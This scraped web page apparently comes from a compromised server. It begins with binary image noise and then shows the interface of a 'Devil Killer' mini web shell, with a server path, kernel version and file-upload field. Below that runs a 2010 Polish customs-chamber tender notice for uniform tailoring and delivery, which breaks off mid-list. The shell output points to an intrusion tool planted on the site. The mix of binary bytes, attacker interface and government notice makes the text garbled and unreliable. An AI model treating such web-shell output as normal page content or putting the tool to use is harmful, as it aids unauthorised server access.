JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100507/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100507/113227-N-2010.html

<p class="kh_header"><b>Wrocław: Szycie i dostawa składników umundurowania - ubioru służbowego, dla 250 funkcjonariuszy celnych Izby Celnej we Wrocławiu, wykonanych zgodnie z Rozporządzeniem Ministra Finansów z dnia 23 listopada 2009 roku w sprawie umundurowania funkcjonariuszy celnych (Dz. U. z 2009r. nr 197, poz. 1521).</b><br>
<b>Numer ogłoszenia: 113227 - 2010; data zamieszczenia: 07.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Izba Celna we Wrocławiu , ul. Hercena 11, 50-950 Wrocław, woj. dolnośląskie, tel. 071 3705328, faks 071 3435439.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.icwroclaw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szycie i dostawa składników umundurowania - ubioru służbowego, dla 250 funkcjonariuszy celnych Izby Celnej we Wrocławiu, wykonanych zgodnie z Rozporządzeniem Ministra Finansów z dnia 23 listopada 2009 roku w sprawie umundurowania funkcjonariuszy celnych (Dz. U. z 2009r. nr 197, poz. 1521)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia.

Przedmiotem zamówienia jest szycie i dostawa składników umundurowania - ubioru służbowego, dla 250 funkcjonariuszy celnych Izby Celnej we Wrocławiu, wykonanych zgodnie z Rozporządzeniem Ministra Finansów z dnia 23 listopada 2009 roku w sprawie umundurowania funkcjonariuszy celnych (Dz. U. z 2009r. nr 197, poz. 1521). 

ZADANIE nr 1
Szycie składników umundurowania służbowego w następujących ilościach:
Marynarki męskie	szt.	134;
Marynarki damskie	szt.	116;
Spodnie damskie	szt.	116;
Spodnie męskie	szt.	268;
Spódnice damskie	szt.	116;
Kamizelki dla funkcjonariusza kobiety 	szt.	116;

Zamawiający w celu realizacji zamówienia powierzy Wykonawcy materiał - gabardynę. 
Pozostałe dodatki krawieckie konieczne do uszycia zapewni Wykonawca.

Wraz z umową na szycie, Zamawiający przekaże Wykonawcy listę osób, dla których zostanie uszyte umundurowanie. 
Pobieranie miary niezbędnej do uszycia poszczególnych składników umundurowania, odbywać się będzie w punktach wskazanych przez Zamawiającego, zlokalizowanych we Wrocławiu, Legnicy, Wałbrzychu, Jeleniej Górze, Żarskiej Wsi oraz Polkowicach. Wykonawca zobowiązuje się do min. dwóch przymiarek w miejscach i terminach uzgodnionych z Zamawiającym po podpisaniu umowy. 
Osoby, dla których będzie szyte umundurowanie, będą się zgłaszać, ze Zleceniem szycia do pobrania miary w terminach i miejscach uzgodnionych z Wykonawcą.
Wykonanie przedmiotu zamówienia nastąpi w terminie do 30.08.2010r. 
Odbiór sortów mundurowych następować będzie osobiście przez użytkownika poprzez podpisanie protokołu odbioru,  po stwierdzeniu przez użytkownika, iż sort jest dopasowany do sylwetki.
Zamówienie musi być wykonane zgodnie ze sztuką krawiecką, z należytą starannością, przez co należy rozumieć: trwałość, estetykę, odpowiednie dopasowanie ubioru do sylwetki. Użyte dodatki krawieckie muszą charakteryzować się trwałością i niezawodnością.
Wykonawca udzieli 12 miesięcznej gwarancji na uszyte składniki umundurowania liczonej od dnia protokolarnego odbioru sortu przez użytkownika.
W okresie gwarancji, wykonawca zobowiązany jest do usunięcia zgłoszonych wad fizycznych  na własny koszt, w terminie nie przekraczającym 21 dni od dnia zgłoszenia.


ZADANIE nr 2
Dostawa koszul służbowych oraz krawatów zamiennie krawatek.
Przedmiotem zamówienia jest dostawa koszul służbowych z długim i krótkim rękawem, w kolorze białym i miętowym oraz krawatów/krawatek w następujących ilościach:
Koszule w kolorze białym z krótkim rękawem  damskie	szt.	116;
Koszule w kolorze białym z długim rękawem damskie	szt.	116;
Koszule w kolorze miętowym z krótkim rękawem damskie	szt.	183;
Koszule w kolorze miętowym z długim rękawem damskie	szt.	183;
Koszule w kolorze białym z krótkim rękawem męskie	szt.	134;
Koszule w kolorze białym z długim rękawem męskie	szt.	134;
Koszule w kolorze miętowym z krótkim rękawem męskie	szt.	204;
Koszule w kolorze miętowym z długim rękawem męskie	szt.	204;
Krawaty 	szt.	134;
Krawatki	szt.	116.

Wykonawca do wykonania zamówienia użyje własnych materiałów zgodnie z charakterystyką materiałową:
Krawat -zamiennie krawatka 	Kolor tkaniny ciemnozielony, określony metodą CIE L*a*b: L*29.37;a*-4,66; b*-7,75, 
E   1 
Poliester 100 %, gładki 
Koszula w kolorze miętowym z długim i krótkim rękawem	Kolor tkaniny miętowy, określony metodą CIE L*a*b: L*60.91;a*-8,35; b*-3,45, E  1 bawełna: min. 55 %  
gramatura 120 g/m2 +/- 6 g/m2
kolor guzików: miętowy 
Koszula w kolorze białym z długim i krótkim rękawem	Bawełna: min. 55 %  
Gramatura 120 g/m2 +/- 6 g/m2
Wraz z umową na dostawę koszul Zamawiający przekaże Wykonawcy rozmiary niezbędne do uszycia koszul.
Po podpisaniu umowy Wykonawca wykona i dostarczy do Zamawiającego w terminie uzgodnionym przez obie strony, po jednej koszuli z każdego rodzaju dla wyznaczonego przez Zamawiającego pracownika oraz krawata i krawatki, celem oceny zgodności ich wykonania.
Po stwierdzeniu przez Zamawiającego, iż dostarczone koszule oraz krawaty i krawatki zostały wykonane zgodnie z wymogami określonymi w Rozporządzeniem Ministra Finansów z dnia 23 listopada 2009 roku w sprawie umundurowania funkcjonariuszy celnych (Dz. U. z 2009r. nr 197, poz. 1521) Wykonawca przystąpi do dalszej realizacji zamówienia.
Wykonawca dostarczy przedmiotowe koszule oraz krawaty/krawatki w terminie do 30.08.2010r.  
Dostawa koszul oraz krawatów/krawatek obejmować będzie ich przywóz oraz wniesienie do magazynu Zamawiającego mieszczącego się w jego siedzibie przy ul. Karmelkowej 31 we Wrocławiu.



ZADANIE nr 3
Dostawa emblematów Służba Celna, sznurów galowych, czarnych dystynkcji do ubioru specjalnego, dystynkcji - do ubioru służbowego  oraz dystynkcji.
przedmiotem zamówienia jest dostawa emblematów Służba Celna, sznurów galowych, czarnych dystynkcji do ubioru specjalnego, dystynkcji - do ubioru służbowego w następujących ilościach: 
Emblemat Służba Celna  	szt.	500;
Sznur galowy 	szt.	250;
Dystynkcje czarne  do ubioru specjalnego 	kpl. 	162; 
Dystynkcje - do ubioru służbowego  	kpl.	1100 wykonanych zgodnie z Rozporządzeniem Ministra Finansów z dnia 23 listopada 2009 roku w sprawie umundurowania funkcjonariuszy celnych (Dz. U. z 2009r. nr 197, poz. 1521) oraz 
Dystynkcje (patki)	kpl.	944 wykonane zgodnie z Rozporządzeniem Ministra Finansów z dnia 20 maja 2000r. w sprawie umundurowania funkcjonariuszy celnych (Dz. U. z 2000r. nr 41 poz. 479).



Wykonawca do wykonania zamówienia użyje własnych materiałów zgodnie z charakterystyką materiałową:
Sznur galowy 	W kolorze srebrnym, wykonany w 100 % z przędzy poliestrowej 
Dystynkcje ubioru służbowego	Kolor tkaniny szarozielony, gabardyna: 45% wełna, 55% PE
Dystynkcje ubioru specjalnego	Kolor tkaniny czarny, gabardyna: 45 % wełna, 55 % PE 
Dystynkcje*	Kolor tkaniny szarozielony, gabardyna: 45% wełna, 55% PE


Po podpisaniu umowy Wykonawca wykona i dostarczy do Zamawiającego w terminie uzgodnionym przez obie strony, jednego emblematu Służba Celna, sznura galowego, czarnej dystynkcji do ubioru specjalnego, dystynkcji - do ubioru służbowego oraz dystynkcji (patek) celem oceny zgodności ich wykonania z wymogami zamówienia.
Po stwierdzeniu przez Zamawiającego, iż dostarczony asortyment został wykonany zgodnie z w/w  Rozporządzeniami. Wykonawca przystąpi do dalszej realizacji zamówienia.
Wykonawca dostarczy przedmiotowy asortyment w terminie do 30.08.2010r. 
Dostawa obejmować będzie przywóz oraz wniesienie przedmiotu zamówienia do magazynu Zamawiającego mieszczącego się w jego siedzibie przy ul. Karmelkowej 31 we Wrocławiu.



ZADANIE nr 4
Dostawa kurtek damskich z podpinką oraz bezrękawnikiem, kurtek męskich z podpinką oraz bezrękawnikiem, swetrów typu polar z obszyciami oraz szalów polarowych
w następujących ilościach:

Kurtka z odpinaną podpinką oraz  bezrękawnikiem damska 	szt.	116;
Kurtka z odpinaną podpinką oraz bezrękawnikiem męska 	szt.	134;
Sweter typu polar z obszyciami 	szt.	250;
Szal polarowy 	szt. 	250;

Wykonawca do wykonania zamówienia użyje własnych materiałów zgodnie z charakterystyką materiałową:
Kurtka 	Kurtka z odpinaną podpinką oraz bezrękawnikiem. 


Wraz z umową na dostawę kurtek damskich z podpinką oraz bezrękawnikiem, kurtek męskich z podpinką oraz bezrękawnikiem, swetrów typu polar z obszyciami Zamawiający przekaże Wykonawcy rozmiary niezbędne do wykonania zamówienia.
Po podpisaniu umowy Wykonawca wykona i dostarczy do Zamawiającego w terminie uzgodnionym przez obie strony, jedną: kurtkę damską z podpinką oraz bezrękawnikiem, kurtkę męską z podpinką oraz bezrękawnikiem, sweter typu polar z obszyciami oraz szal polarowy, celem oceny zgodności wykonania zamówienia.
Po stwierdzeniu przez Zamawiającego, iż dostarczony asortyment został wykonany zgodnie z  Rozporządzeniem.  Wykonawca przystąpi do dalszej realizacji zamówienia.
Wykonawca dostarczy przedmiot zamówienia w terminie do 30.08.2010r.  
Dostawa przedmiotu zamówienia obejmować będzie przywóz oraz wniesienie do magazynu Zamawiającego mieszczącego się w jego siedzibie przy ul. Karmelkowej 31 we Wrocławiu.



ZADANIEnr 5
Dostawa kapelusików oraz czapek służbowych
w następujących ilościach:
Kapelusik 	szt.	116;
Czapka służbowa 	szt.	134. Wykonawca do wykonania kapelusików użyje własnych materiałów, natomiast na wykonanie czapek służbowych materiał - gabardynę powierzy Zamawiający. 
Pozostałe dodatki krawieckie konieczne do uszycia zapewni Wykonawca.



Wraz z umową na dostawę kapelusików oraz czapek służbowych Zamawiający przekaże Wykonawcy rozmiary niezbędne do wykonania kapelusików oraz czapek służbowych.
Po podpisaniu umowy Wykonawca wykona i dostarczy do Zamawiającego w terminie uzgodnionym przez obie strony, jeden kapelusik oraz jedną czapkę służbową, celem oceny zgodności wykonania zmówienia.
Po stwierdzeniu przez Zamawiającego, iż dostarczony asortyment został wykonany zgodnie z Rozporządzeniem  Wykonawca przystąpi do dalszej realizacji zamówienia.
Wykonawca dostarczy przedmiotowe kapelusiki oraz czapki służbowe w terminie do 30.08.2010r.  
Dostawa czapek służbowych oraz kapelusików obejmować będzie ich przywóz oraz wniesienie do magazynu Zamawiającego mieszczącego się w jego siedzibie przy ul. Karmelkowej 31 we Wrocławiu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 98.39.30.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium: 
Zadanie 1  w kwocie: 3.000,00 PLN (słownie: trzy tysiące złotych),
Zadanie 2  w kwocie: 1.300,00 PLN (słownie: jeden tysiąc trzysta złotych), 
Zadanie 3  w kwocie: 1.000,00 PLN (słownie: jeden tysiąc złotych), 
Zadanie 4  w kwocie: 2.500,00 PLN (słownie: dwa tysiące pięćset złotych),
Zadanie 5  w kwocie: 600,00 PLN (słownie: sześćset  złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy przedstawią oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZADANIE 1 przedstawią wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w ciągu ostatnich trzech lat co najmniej dwóch usług zbliżonych co do zakresu i wartości do niniejszego zamówienia tj. o wartości przekraczającej 100.000 zł brutto każde, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie . Do wykazu należy dołączyć dokumenty podmiotów na rzecz, których wykonane było świadczenie potwierdzające, że usługi zostały wykonane należycie.
ZADANIE 2 przedstawią wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w ciągu ostatnich trzech lat, co najmniej dwóch usług zbliżonych, co do zakresu i wartości do niniejszego zamówienia tj. o wartości przekraczającej 50.000zł brutto każde, a jeżeli  okres  prowadzenia działalności jest krótszy to w tym okresie. Do wykazu należy dołączyć dokumenty podmiotów na rzecz, których wykonane było świadczenie potwierdzające, że usługi zostały wykonane należycie.
ZADANIE 3 przedstawią wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w ciągu ostatnich trzech lat co najmniej dwóch usług zbliżonych co do zakresu i wartości do niniejszego zamówienia tj. o wartości przekraczającej 30.000 zł brutto każde, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie. Do wykazu należy dołączyć dokumenty podmiotów na rzecz, których wykonane było świadczenie potwierdzające, że usługi zostały wykonane należycie.
ZADANIE 4 przedstawią wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w ciągu ostatnich trzech lat, co najmniej dwóch usług zbliżonych, co do zakresu i wartości do niniejszego zamówienia tj. o wartości przekraczającej 80.000 zł brutto każde, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie. Do wykazu należy dołączyć dokumenty podmiotów na rzecz, których wykonane było świadczenie potwierdzające, że usługi zostały wykonane należycie.
ZADANIE 5 przedstawią wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w ciągu ostatnich trzech lat, co najmniej dwóch usług zbliżonych, co do zakresu i wartości do niniejszego zamówienia tj. o wartości przekraczającej 20.000zł brutto każde, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie. Do wykazu należy dołączyć dokumenty podmiotów na rzecz, których wykonane było świadczenie potwierdzające, że usługi zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZADANIE 1 przedstawią opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 100.000zł.  
ZADANIE 2 przedstawią opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 50.000zł.   
ZADANIE 3 przedstawią opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 30.000,00zł.  
ZADANIE 4 przedstawią opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 80.000zł.   
ZADANIE 5 przedstawią opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 20.000zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.icwroclaw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Izba Celna we Wrocławiu ul. Hercena 11 pok. 204..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.05.2010 godzina 10:00, miejsce: Izba Celna we Wrocławiu ul. Hercena 11 pok. 5..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Szycie składników umundurowania służbowego: marynarki, spodnie, 
spódnice, kamizelki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szycie składników umundurowania służbowego w następujących ilościach:
Marynarki męskie	szt.	134;
Marynarki damskie	szt.	116;
Spodnie damskie	szt.	116;
Spodnie męskie	szt.	268;
